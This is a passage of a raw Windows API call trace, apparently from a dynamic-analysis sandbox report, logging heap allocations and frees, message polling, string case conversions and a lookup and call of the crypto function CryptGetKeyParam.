0x43cf900 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0125.450] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.451] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0125.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.452] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0125.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0125.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.453] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0125.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0125.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0125.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0125.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0125.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.457] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0125.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0125.458] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2760, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2760*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0125.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0125.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.460] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0125.460] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.460] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.461] HeapFree (in: 